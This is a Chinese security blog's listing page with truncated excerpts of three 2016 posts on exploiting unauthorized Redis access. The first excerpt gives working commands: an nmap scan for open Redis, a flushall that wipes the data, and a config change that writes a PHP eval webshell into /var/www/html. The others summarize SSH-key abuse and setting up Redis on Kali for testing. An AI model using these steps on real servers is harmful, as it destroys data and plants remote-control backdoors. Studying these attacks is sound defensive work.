redis写webshell redis

redis写webshell redis
nmap --script=redis-info  -p6379 192.168.1.0/24 --open   redis写webshell 刷新并进入redis控制台 redis-cli -h 192.168.20.215 flushall exit redis-cli -h 192.168.20.215 修改默认目录和文件名(需要web的绝对路径) config set dir /var/www/html config set dbfilename index1.php set a2 "<?php @eval($_POST[cmd]);?>" save  ssh-...
2016年04月11日 学习笔记 暂无评论 喜欢 0 阅读 4,823 views 次 阅读全文

Redis 未授权访问配合 SSH key 文件利用分析

Redis 未授权访问配合 SSH key 文件利用分析
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis 未授权访问的问题是一直存在的问题,知道创宇安全研究团队历史上也做过相关的应急,今日,又出现 Redis 未授权访问配合 SSH key 文件被利用的情况,导致一大批 Redis 服务器被黑,今天我们来简要的分析下。 一、漏洞概述 Redis 默认情况下,会...
2016年04月11日 汪洋大海 暂无评论 喜欢 0 阅读 2,242 views 次 阅读全文

kali linux安装redis 及使用客户端命令 redis-cli -h

kali linux安装redis 及使用客户端命令 redis-cli -h
本文主要是为了利用kali linux2.0 测试redis未授权访问。并非非常非常详细讲redis如何安装及设置。 首先,你需要下载最新的redis,例如我下载的就是稳定版,非最新版。地址:http://download.redis.io/releases/redis-3.0.7.tar.gz 然后你随意解压到哪个目录,然后在那个目录打开终端。直接输入命令:make 安装。安装完后,你需要进入SRC文件夹,然后输入下面的命令:cp red...
2016年04月11日 学习笔记 暂无评论 喜欢 2 阅读 8,874 views 次 阅读全文